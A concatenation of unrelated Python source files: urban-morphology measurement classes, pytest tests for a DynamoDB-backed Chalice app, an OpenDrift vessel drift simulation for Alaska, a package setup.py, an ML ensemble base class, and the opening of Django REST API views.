if not possible_int.is_empty.all():
true_int = []
for one in list(possible_int.index):
if possible_int[one].type == "Point":
true_int.append(possible_int[one])
elif possible_int[one].type == "MultiPoint":
for p in possible_int[one]:
true_int.append(p)
if len(true_int) > 1:
distances = []
ix = 0
for p in true_int:
dist = p.distance(Point(tick.coords[-1]))
distances.append(dist)
ix = ix + 1
minimal = min(distances)
if ix == 0:
lefts.append(minimal)
else:
rights.append(minimal)
else:
if ix == 0:
lefts.append(
true_int[0].distance(Point(tick.coords[-1]))
)
else:
rights.append(
true_int[0].distance(Point(tick.coords[-1]))
)
if heights is not None:
indices = {}
for idx, row in get_height.iterrows():
dist = row.geometry.distance(Point(tick.coords[-1]))
indices[idx] = dist
minim = min(indices, key=indices.get)
m_heights.append(right.loc[minim][heights])
openness = (len(lefts) + len(rights)) / len(ticks * 2)
openness_list.append(1 - openness)
if rights and lefts:
results_list.append(2 * np.mean(lefts + rights))
deviations_list.append(np.std(lefts + rights))
elif not lefts and rights:
results_list.append(2 * np.mean([np.mean(rights), tick_length / 2]))
deviations_list.append(np.std(rights))
elif not rights and lefts:
results_list.append(2 * np.mean([np.mean(lefts), tick_length / 2]))
deviations_list.append(np.std(lefts))
else:
results_list.append(tick_length)
deviations_list.append(0)
if heights is not None:
if m_heights:
heights_list.append(np.mean(m_heights))
heights_deviations_list.append(np.std(m_heights))
else:
heights_list.append(0)
heights_deviations_list.append(0)
self.w = pd.Series(results_list, index=left.index)
self.wd = pd.Series(deviations_list, index=left.index)
self.o = pd.Series(openness_list, index=left.index)
if heights is not None:
self.h = pd.Series(heights_list, index=left.index)
self.hd = pd.Series(heights_deviations_list, index=left.index)
self.p = self.h / self.w
# http://wikicode.wikidot.com/get-angle-of-line-between-two-points
# https://glenbambrick.com/tag/perpendicular/
# angle between two points
def _getAngle(self, pt1, pt2):
x_diff = pt2.x - pt1.x
y_diff = pt2.y - pt1.y
return math.degrees(math.atan2(y_diff, x_diff))
# start and end points of chainage tick
# get the first end point of a tick
def _getPoint1(self, pt, bearing, dist):
angle = bearing + 90
bearing = math.radians(angle)
x = pt.x + dist * math.cos(bearing)
y = pt.y + dist * math.sin(bearing)
return Point(x, y)
# get the second end point of a tick
def _getPoint2(self, pt, bearing, dist):
bearing = math.radians(bearing)
x = pt.x + dist * math.cos(bearing)
y = pt.y + dist * math.sin(bearing)
return Point(x, y)
class WeightedCharacter:
"""
Calculates the weighted character
Character weighted by the area of the objects within ``k`` topological steps defined in ``spatial_weights``.
.. math::
\\frac{\\sum_{i=1}^{n} {character_{i} * area_{i}}}{\\sum_{i=1}^{n} area_{i}}
Adapted from :cite:`dibble2017`.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
values : str, list, np.array, pd.Series
the name of the gdf dataframe column, ``np.array``, or ``pd.Series`` where is stored character to be weighted
spatial_weights : libpysal.weights
spatial weights matrix - If None, Queen contiguity matrix of set order will be calculated
based on left.
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
areas : str, list, np.array, pd.Series (default None)
the name of the left dataframe column, ``np.array``, or ``pd.Series`` where is stored area value
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
values : GeoDataFrame
Series containing used values
areas : GeoDataFrame
Series containing used areas
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
Examples
--------
>>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation_df, threshold=100, silence_warnings=True)
>>> buildings_df['w_height_100'] = momepy.WeightedCharacter(buildings_df, values='height', spatial_weights=sw,
unique_id='uID').series
100%|██████████| 144/144 [00:00<00:00, 361.60it/s]
"""
def __init__(self, gdf, values, spatial_weights, unique_id, areas=None):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
data = gdf.copy()
if areas is None:
areas = gdf.geometry.area
if not isinstance(areas, str):
data["mm_a"] = areas
areas = "mm_a"
if not isinstance(values, str):
data["mm_vals"] = values
values = "mm_vals"
self.areas = data[areas]
self.values = data[values]
data = data.set_index(unique_id)[[values, areas]]
results_list = []
for index in tqdm(data.index, total=data.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
subset = data.loc[neighbours]
results_list.append(
(sum(subset[values] * subset[areas])) / (sum(subset[areas]))
)
else:
results_list.append(np.nan)
self.series = pd.Series(results_list, index=gdf.index)
class CoveredArea:
"""
Calculates the area covered by neighbours
Total area covered by neighbours defined in ``spatial_weights`` and element itself.
.. math::
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing Polygon geometry
spatial_weights : libpysal.weights
spatial weights matrix
unique_id : str
name of the column with unique id used as ``spatial_weights`` index.
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
id : Series
Series containing used unique ID
Examples
--------
>>> sw = momepy.sw_high(k=3, gdf=tessellation_df, ids='uID')
>>> tessellation_df['covered3steps'] = mm.CoveredArea(tessellation_df, sw, 'uID').series
100%|██████████| 144/144 [00:00<00:00, 549.15it/s]
"""
def __init__(self, gdf, spatial_weights, unique_id):
self.gdf = gdf
self.sw = spatial_weights
self.id = gdf[unique_id]
data = gdf
area = data.set_index(unique_id).geometry.area
results_list = []
for index in tqdm(area.index, total=area.shape[0]):
if index in spatial_weights.neighbors.keys():
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
areas = area.loc[neighbours]
results_list.append(sum(areas))
else:
results_list.append(np.nan)
self.series = pd.Series(results_list, index=gdf.index)
class PerimeterWall:
"""
Calculate the perimeter wall length the joined structure.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing objects to analyse
spatial_weights : libpysal.weights, optional
spatial weights matrix - If None, Queen contiguity matrix will be calculated
based on gdf. It is to denote adjacent buildings (note: based on index, not ID).
Attributes
----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
Examples
--------
>>> buildings_df['wall_length'] = mm.PerimeterWall(buildings_df).series
Calculating spatial weights...
Spatial weights ready...
100%|██████████| 144/144 [00:00<00:00, 4171.39it/s]
Notes
-----
It might take a while to compute this character.
"""
def __init__(self, gdf, spatial_weights=None):
self.gdf = gdf
if spatial_weights is None:
print("Calculating spatial weights...")
from libpysal.weights import Queen
spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
print("Spatial weights ready...")
self.sw = spatial_weights
# dict to store walls for each uID
walls = {}
components = pd.Series(spatial_weights.component_labels, index=range(len(gdf)))
geom = gdf.geometry
for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0]):
# if the id is already present in walls, continue (avoid repetition)
if i in walls:
continue
else:
comp = spatial_weights.component_labels[i]
to_join = components[components == comp].index
joined = geom.iloc[to_join]
dissolved = joined.buffer(
0.01
).unary_union # buffer to avoid multipolygons where buildings touch by corners only
for b in to_join:
walls[b] = dissolved.exterior.length
results_list = []
for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0]):
results_list.append(walls[i])
self.series = pd.Series(results_list, index=gdf.index)
class SegmentsLength:
"""
Calculate the cummulative and/or mean length of segments.
Length of segments within set topological distance from each of them.
Reached topological distance should be captured by ``spatial_weights``. If ``mean=False`` it
will compute sum of length, if ``mean=True`` it will compute sum and mean.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing streets (edges) to analyse
spatial_weights : libpysal.weights, optional
spatial weights matrix - If None, Queen contiguity matrix will be calculated
based on streets (note: spatial_weights should be based on index, not unique ID).
mean : boolean, optional
If mean=False it will compute sum of length, if mean=True it will compute
sum and mean
Attributes
----------
series : Series
Series containing resulting total lengths
mean : Series
Series containing resulting total lengths
sum : Series
Series containing resulting total lengths
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
Examples
--------
>>> streets_df['length_neighbours'] = mm.SegmentsLength(streets_df, mean=True).mean
Calculating spatial weights...
Spatial weights ready...
"""
def __init__(self, gdf, spatial_weights=None, mean=False):
self.gdf = gdf
if spatial_weights is None:
print("Calculating spatial weights...")
from libpysal.weights import Queen
spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
print("Spatial weights ready...")
self.sw = spatial_weights
lenghts = gdf.geometry.length
sums = []
means = []
for index in tqdm(gdf.index, total=gdf.shape[0]):
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
dims = lenghts.iloc[neighbours]
if mean:
means.append(np.mean(dims))
sums.append(sum(dims))
self.series = self.sum = pd.Series(sums, index=gdf.index)
if mean:
self.mean = pd.Series(means, index=gdf.index)
| 33,900 | 9,889 |
import operator
import pytest
from chalice import NotFoundError
import app
from tests.testdata.ddb_items import TESTDATA_DDB_ITEMS
DEFAULT_USERNAME = 'default'
class TestDB:
pass
class TestListAllItems(TestDB):
def test_Return_all_items(self, mock):
"""list_all_items: すべてのアイテムを取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().list_all_items() == TESTDATA_DDB_ITEMS
class TestListItems(TestDB):
def test_Return_items_by_username(self, mock):
"""list_items: ユーザーdefaultのアイテムをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
query = ''
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual = sorted(actual, key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
@pytest.mark.parametrize('query', ['🐈', '🍆'])
def test_Return_items_by_query(self, query, mock):
"""list_items: ユーザーdefaultのアイテムからクエリを満たすものをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual.sort(key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = [item for item in expected
if query in item['subject'] or query in item['description']]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
class TestAddItem(TestDB):
@pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
def test_Return_uid_str_cace_subject_description(self, item):
"""add_item: subjectとdescriptionがあるケース、正常にクエリを投げuidを受け取ることができる"""
actual = app.get_app_db().add_item(
subject=item['subject'],
description=item['description'],
username=DEFAULT_USERNAME)
assert type(actual) == str
assert len(actual) == 36
# 以下の状況によりこのテストケースは現時点において実施しない (2020-11-30)
#
# [状況] Amazon DynamoDB 2020-05-18 以降の仕様では、
# 文字列型/バイナリ型の項目について空の文字列「''」を許すようになっている
# 本テストに使用している moto による DynamoDB のモックの仕様は現時点においてまだ追従していないため、
# 空の文字列の登録許さないため、このテストケースを実行するとエラーが発生してしまう
# この状況があてはまらなくなったら、適宜コメントアウトを外し以下のテストケースを実施する
#
# @pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
# def test_Return_uid_str_cace_subject_only(self, item):
# """add_item: subjectのみのケース、正常にクエリを投げuidを受け取ることができる"""
# actual = app.get_app_db().add_item(
# subject=item['subject'],
# username=DEFAULT_USERNAME)
# assert type(actual) == str
# assert len(actual) == 36
def test_Raise_case_description_only(self):
"""add_item: descriptionのみのケース、例外を発生させることができる"""
with pytest.raises(TypeError):
app.get_app_db().add_item(
description='',
username=DEFAULT_USERNAME)
class TestGetItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_item(self, mock, item):
"""get_item: uidが存在するケース、itemを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().get_item(
uid=item['uid'], username=item['username']) == item
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""get_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().get_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestDeleteItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_str(self, mock, item):
"""delete_item: uidが存在するケース、削除したitemのuidを正常に返すことができる"""
mock.table.put_items([item])
assert app.get_app_db().delete_item(
item['uid'], username=item['username']) == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""delete_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().delete_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestUpdateItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_all_attributes(self, mock, item):
"""update_item: すべての属性を更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
description=item['description']+"_updated",
state=item['state'],
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_subject_only(self, mock, item):
"""update_item: subjectを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_description_only(self, mock, item):
"""update_item: descriptionを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
description=item['description']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_state_only(self, mock, item):
"""update_item: stateを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
state=item['state'],
username=item['username'])
assert actual == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""update_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().update_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
| 6,430 | 2,551 |
#!python
"""Launch vessel drift simulations.
Methodology
-----------
For every week with forcing data, simulated vessels are launched from every cell where
a vessel was present in the AIS data.
The drift angle (up to 60 deg.), windage scaling (2% - 10% of 10 m), and left/right
direction is randomly assigned per simulated vessel.
"""
import datetime
import logging
import time
from dataclasses import dataclass
from pathlib import Path
from typing import List
import numpy as np
import rasterio
from opendrift.models.basemodel import OpenDriftSimulation
from opendrift.models.oceandrift import LagrangianArray
from opendrift.readers import reader_netCDF_CF_generic, reader_shape
from rasterio import warp
logging.basicConfig(level=logging.WARNING)
RANGE_LIMIT_RADS = 60 * np.pi / 180
TIF_DIR = '/mnt/store/data/assets/nps-vessel-spills/ais-data/ais-data-2015-2020/processed_25km/2019/epsg4326'
class Vessel(LagrangianArray):
"""Extend LagrangianArray for use with Alaskan Vessel Drift Project."""
variables = LagrangianArray.add_variables([
(
'wind_scale',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
),
(
'wind_offset',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
)
])
class AlaskaDrift(OpenDriftSimulation):
ElementType = Vessel
required_variables = [
'x_wind',
'y_wind',
'eastward_sea_water_velocity',
'northward_sea_water_velocity',
'eastward_sea_ice_velocity',
'northward_sea_ice_velocity',
'sea_ice_area_fraction',
'land_binary_mask'
]
def seed_elements(
self,
lon,
lat,
radius=0,
number=None,
time=None,
seed=187,
range_limit_rads=RANGE_LIMIT_RADS,
**kwargs
):
if number is None:
number = self.get_config('seed:number_of_elements')
# drift is going to be a random value between 2% - 10% of wind
# (b - a) * random_sample + a
# a = 0.02
# b = 0.1
wind_scale = (0.1 - 0.02) * np.random.random_sample((number,)) + 0.02
# offset is -60 deg. to 60 deg.
# a = -60
# b = 60
# (60 - (-60)) * random_sample + (-60)
wind_offset = (range_limit_rads + range_limit_rads) * np.random.random_sample((number,)) - range_limit_rads # noqa
super(AlaskaDrift, self).seed_elements(
lon=lon,
lat=lat,
radius=radius,
number=number,
time=time,
wind_scale=wind_scale,
wind_offset=wind_offset,
**kwargs
)
def update(self):
"""Update ship position taking into account wind, currents, stokes, and ice."""
# Inspired by `advect_oil`
if hasattr(self.environment, 'sea_ice_area_fraction'):
ice_area_fraction = self.environment.sea_ice_area_fraction
# Above 70%–80% ice cover, the oil moves entirely with the ice.
k_ice = (ice_area_fraction - 0.3) / (0.8 - 0.3)
k_ice[ice_area_fraction < 0.3] = 0
k_ice[ice_area_fraction > 0.8] = 1
factor_stokes = (0.7 - ice_area_fraction) / 0.7
factor_stokes[ice_area_fraction > 0.7] = 0
else:
k_ice = 0
factor_stokes = 1
# 1. update wind
windspeed = np.sqrt(self.environment.x_wind**2 + self.environment.y_wind**2)
windspeed *= self.elements.wind_scale
# update angle using random offset +- 60 deg
# windir is in rads, so need to convert
winddir = np.arctan2(self.environment.y_wind, self.environment.x_wind)
winddir += self.elements.wind_offset
wind_x = windspeed * np.cos(winddir)
wind_y = windspeed * np.sin(winddir)
# Scale wind by ice factor
wind_x = wind_x * (1 - k_ice)
wind_y = wind_y * (1 - k_ice)
self.update_positions(wind_x, wind_y)
# 2. update with sea_water_velocity
# This assumes x_sea_water_velocity and not eastward_sea_water_velocity...
#self.advect_ocean_current(factor=1 - k_ice)
self.update_positions(
self.environment.eastward_sea_water_velocity * (1 - k_ice),
self.environment.northward_sea_water_velocity * (1 - k_ice)
)
# 3. Advect with ice
self.advect_with_sea_ice(factor=k_ice)
# Deactivate elements that hit the land mask
self.deactivate_elements(
self.environment.land_binary_mask == 1,
reason='ship stranded'
)
@dataclass
class SimulationConfig:
"""Configuration for a single OpenDrift simulation"""
start_date: datetime.datetime
readers: List
number: int
radius: float = 25000 # this is meters from given x,y point
time_step: int = 900
time_step_output: int = 3600
duration: datetime.timedelta = datetime.timedelta(days=7)
outfile: str = None
loglevel: int = logging.INFO
def lonlat_from_tif(date, tif_file, dst_crs=rasterio.crs.CRS.from_epsg(4326)):
"""Return (lon, lat) in TIFF with cell value > 0"""
with rasterio.open(tif_file) as ds:
src_crs = ds.crs
idx = np.argwhere(ds.read(1))
x, y = ds.xy(idx[:, 0], idx[:, 1])
lon, lat = warp.transform(
src_crs,
dst_crs,
x,
y
)
# need to change from [-180, 180] to [0, 360]
lon = np.array(lon) % 360
lat = np.array(lat)
return lon, lat
# ~2 min per test
def run_sims_for_date(run_config, tif_dir=TIF_DIR):
vessel_types = ['cargo', 'other', 'passenger', 'tanker']
# Run simulation using data for start date for every vessel type
month = run_config.start_date.month
tif_files = list(Path(tif_dir).glob('*.tif'))
tif_files.sort()
base_fname = run_config.outfile
for vessel_type in vessel_types:
try:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2019*.tif'))[0]
except IndexError:
if month == 12:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2020*.tif'))[0]
else:
raise IndexError(f"No AIS data found for {month}")
logging.info(f'Starting simulation preparation for {tif_file=}')
vessel_type = tif_file.name.split('.')[0].split('_')[0]
# prepend out name with vessel type
outfile = vessel_type + '_' + base_fname
# release points from each ais location where a vessel was in the past
lons, lats = lonlat_from_tif(run_config.start_date, tif_file)
# launch vessel simulation
vessel_sim = AlaskaDrift(loglevel=run_config.loglevel)
vessel_sim.add_reader(run_config.readers)
for i in range(run_config.number):
vessel_sim.seed_elements(
lon=lons,
lat=lats,
time=run_config.start_date,
number=len(lons),
radius=run_config.radius
)
# Disabling the automatic GSHHG landmask
vessel_sim.set_config('general:use_auto_landmask', False)
# Backup velocities
vessel_sim.set_config('environment:fallback:sea_ice_area_fraction', 0)
vessel_sim.set_config('environment:fallback:northward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:northward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:x_wind', 0)
vessel_sim.set_config('environment:fallback:y_wind', 0)
vessel_sim.run(
time_step=run_config.time_step,
time_step_output=run_config.time_step_output,
duration=run_config.duration,
outfile=outfile
)
def run_simulations(
days=7,
number=50,
radius=5000,
timestep=900,
output_timestep=3600,
tif_dir=TIF_DIR,
loglevel=logging.INFO
):
# start date possible to launch drifter, limited by availability of HYCOM data
start_date = datetime.datetime(2019, 1, 8)
# last date possible to launch drifter, limited by availability of NAM data (2019-12-17)
last_date = datetime.datetime(2019, 12, 10)
date = start_date
duration = datetime.timedelta(days=days)
# currents + ice
hycom_file = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/hycom/final-files/hycom.nc'
# Provide a name mapping to work with package methods:
name_map = {
'eastward_sea_water_velocity': 'x_sea_water_velocity',
'northward_sea_water_velocity': 'y_sea_water_velocity',
'siu': 'x_sea_ice_velocity',
'siv': 'y_sea_ice_velocity',
}
hycom_reader = reader_netCDF_CF_generic.Reader(hycom_file, standard_name_mapping=name_map)
# winds
fname = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/nam/regrid/nam.nc'
nam_reader = reader_netCDF_CF_generic.Reader(fname)
# land - cannot use default landmask as it is -180, 180
# Instead, we use the same landmask with lons shifted to 0, 360
fname = '/mnt/store/data/assets/nps-vessel-spills/sim-scripts/drift/world_0_360.shp'
reader_landmask = reader_shape.Reader.from_shpfiles(fname)
# Reader order matters. first reader sets the projection for the simulation.
readers = [hycom_reader, nam_reader, reader_landmask]
sim_start_time = time.perf_counter()
while date <= last_date:
try:
logging.info(f'simulation started for {date:%Y-%m-%d}')
start_time = time.perf_counter()
output_fname = f'alaska_drift_{date:%Y-%m-%d}.nc'
config = SimulationConfig(
date,
readers,
number,
radius,
timestep,
output_timestep,
duration,
output_fname,
loglevel
)
run_sims_for_date(config, tif_dir)
end_time = time.perf_counter()
total_time = int(end_time - start_time)
logging.info(f'simulation complete {total_time} s')
except Exception as e:
logging.warning(f'simulation failed for {date:%Y-%m-%d}')
logging.warning(str(e))
date = date + datetime.timedelta(days=days)
sim_end_time = time.perf_counter()
total_sim_time = int(sim_end_time - sim_start_time)
logging.info(f'total sim time {total_sim_time} s')
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--number',
default=50,
type=int,
help='Number of vessels to launch per simulation'
)
parser.add_argument(
'-r',
'--radius',
default=25000,
type=float,
help='Max distance from release point to launch vessel (in meters)'
)
parser.add_argument(
'-a',
'--ais',
default=TIF_DIR,
type=str,
help='Path to dir with AIS tifs for release points'
)
args = parser.parse_args()
run_simulations(
days=7,
number=args.number,
radius=args.radius,
timestep=900,
output_timestep=86400,
tif_dir=args.ais,
loglevel=logging.INFO
)
if __name__ == '__main__':
main()
| 11,651 | 3,967 |
from setuptools import setup
import io
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pyxstruct',
packages = ['pyxstruct'],
version = '1.0.3',
description = 'Scrape Geometric X-ray Data from the Cambridge Structural Database ',
long_description=long_description,
long_description_content_type='text/markdown',
author = 'Paton Research Group',
author_email = 'robert.paton@colostate.edu',
url = 'https://github.com/bobbypaton/pyX-Struct',
download_url = 'https://github.com/bobbypaton/pyX-Struct/archive/v1.0.3.zip',
keywords = ['x-ray structure', 'CCDC', 'SMILES', 'python'],
classifiers = [],
install_requires=["numpy","seaborn","pandas","matplotlib"],
python_requires='>=2.6',
include_package_data=True,
)
| 932 | 322 |
# -*- coding:utf-8 -*-
__author__ = 'yangjian'
"""
"""
import copy
import pickle
from sklearn.model_selection import StratifiedKFold
from hypernets.utils import fs
class BaseEnsemble:
import numpy as np
def __init__(self, task, estimators, need_fit=False, n_folds=5, method='soft', random_state=9527):
self.task = task
self.estimators = list(estimators)
self.need_fit = need_fit
self.method = method
self.n_folds = n_folds
self.random_state = random_state
self.classes_ = None
for est in estimators:
if est is not None and self.classes_ is None and hasattr(est, 'classes_'):
self.classes_ = est.classes_
break
def _estimator_predict(self, estimator, X):
if self.task == 'regression':
pred = estimator.predict(X)
else:
# if self.classes_ is None and hasattr(estimator, 'classes_'):
# self.classes_ = estimator.classes_
assert self.classes_ is not None
pred = estimator.predict_proba(X)
if self.method == 'hard':
pred = self.proba2predict(pred)
return pred
def _cross_validator(self):
return StratifiedKFold(n_splits=self.n_folds, shuffle=True, random_state=self.random_state)
def proba2predict(self, proba, proba_threshold=0.5):
assert len(proba.shape) <= 2
if self.task == 'regression':
return proba
if len(proba.shape) == 2:
if proba.shape[-1] > 2:
predict = proba.argmax(axis=-1)
else:
predict = (proba[:, -1] > proba_threshold).astype('int32')
else:
predict = (proba > proba_threshold).astype('int32')
return predict
def fit(self, X, y, est_predictions=None):
assert y is not None
if est_predictions is not None:
self._validate_predictions(X, y, est_predictions)
else:
assert X is not None
if self.need_fit:
est_predictions = self._Xy2predicttions(X, y)
else:
est_predictions = self._X2predictions(X)
self.fit_predictions(est_predictions, y)
def _validate_predictions(self, X, y, est_predictions):
# print(f'est_predictions.shape:{est_predictions.shape}, estimators:{len(self.estimators)}')
if self.task == 'regression' or self.method == 'hard':
assert est_predictions.shape == (len(y), len(self.estimators)), \
f'shape is not equal, may be a wrong task type. task:{self.task}, ' \
f'est_predictions.shape: {est_predictions.shape}, ' \
f'(len(y), len(self.estimators)):{(len(y), len(self.estimators))}'
else:
assert len(est_predictions.shape) == 3
assert est_predictions.shape[0] == len(y)
assert est_predictions.shape[1] == len(self.estimators)
def _Xy2predicttions(self, X, y):
if self.task == 'regression' or self.method == 'hard':
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators)), dtype=np.float64)
else:
est_predictions = None
iterators = self._cross_validator()
for fold, (train, test) in enumerate(iterators.split(X, y)):
for n, estimator in enumerate(self.estimators):
X_train = X.iloc[train]
y_train = y.iloc[train]
X_test = X.iloc[test]
estimator.fit(X_train, y_train)
if self.classes_ is None and hasattr(estimator, 'classes_'):
self.classes_ = estimator.classes_
pred = self._estimator_predict(estimator, X_test)
if est_predictions is None:
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators), pred.shape[1]), dtype=np.float64)
est_predictions[test, n] = pred
return est_predictions
def _X2predictions(self, X):
np = self.np
if self.task == 'regression' or self.method == 'hard':
est_predictions = np.zeros((len(X), len(self.estimators)), dtype=np.float64)
else:
est_predictions = np.zeros((len(X), len(self.estimators), len(self.classes_)), dtype=np.float64)
for n, estimator in enumerate(self.estimators):
if estimator is not None:
pred = self._estimator_predict(estimator, X)
if self.task == 'regression' and len(pred.shape) > 1:
assert pred.shape[1] == 1
pred = pred.reshape(pred.shape[0])
est_predictions[:, n] = pred
return est_predictions
def predict(self, X):
est_predictions = self._X2predictions(X)
pred = self.predictions2predict(est_predictions)
if self.task != 'regression' and self.classes_ is not None:
np = self.np
pred = np.take(np.array(self.classes_), pred, axis=0)
return pred
def predict_proba(self, X):
est_predictions = self._X2predictions(X)
return self.predictions2predict_proba(est_predictions)
def fit_predictions(self, predictions, y_true):
raise NotImplementedError()
def predictions2predict_proba(self, predictions):
raise NotImplementedError()
def predictions2predict(self, predictions):
raise NotImplementedError()
def save(self, model_path):
if not model_path.endswith(fs.sep):
model_path = model_path + fs.sep
if not fs.exists(model_path):
fs.mkdirs(model_path, exist_ok=True)
stub = copy.copy(self)
estimators = self.estimators
if estimators is not None:
stub.estimators = [None for _ in estimators] # keep size
if estimators is not None:
for i, est in enumerate(estimators):
est_pkl = f'{model_path}{i}.pkl'
est_model = f'{model_path}{i}.model'
for t in [est_pkl, est_model]:
if fs.exists(t):
fs.rm(t)
if est is None:
continue
with fs.open(est_pkl, 'wb') as f:
pickle.dump(est, f, protocol=pickle.HIGHEST_PROTOCOL)
if hasattr(est, 'save') and hasattr(est, 'load'):
est.save(est_model)
with fs.open(f'{model_path}ensemble.pkl', 'wb') as f:
pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)
@staticmethod
def load(model_path):
if not model_path.endswith(fs.sep):
model_path = model_path + fs.sep
with fs.open(f'{model_path}ensemble.pkl', 'rb') as f:
stub = pickle.load(f)
if stub.estimators is not None:
for i in range(len(stub.estimators)):
if fs.exists(f'{model_path}{i}.pkl'):
with fs.open(f'{model_path}{i}.pkl', 'rb') as f:
est = pickle.load(f)
if fs.exists(f'{model_path}{i}.model') and hasattr(est, 'load'):
est = est.load(f'{model_path}{i}.model')
stub.estimators[i] = est
return stub
| 7,317 | 2,291 |
from .product import Product
from .departament import Departament
from .city import City
from .orderDetail import OrderDetail
from .order import Order
from .user import User | 173 | 41 |
from django.db.models.query import Prefetch
from rest_framework.generics import ListAPIView, ListCreateAPIView
from apis.betterself.v1.supplements.filters import IngredientCompositionFilter, SupplementFilter, \
UserSupplementStackFilter, UserSupplementStackCompositionFilter
from apis.betterself.v1.supplements.serializers import IngredientCompositionReadOnlySerializer, \
SupplementCreateUpdateSerializer, MeasurementReadOnlySerializer, IngredientSerializer, VendorSerializer, \
SupplementReadSerializer, IngredientCompositionCreateSerializer, UserSupplementStackReadSerializer, \
UserSupplementStackCreateUpdateSerializer, UserSupplementStackCompositionCreateUpdateSerializer, \
UserSupplementStackCompositionReadSerializer
from apis.betterself.v1.utils.views import ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin
from supplements.models import Ingredient, IngredientComposition, Measurement, Supplement, UserSupplementStack, \
UserSupplementStackComposition
from vendors.models import Vendor
"""
These inherited models such as BaseGenericListCreateAPIViewV1 contain a override to get_queryset
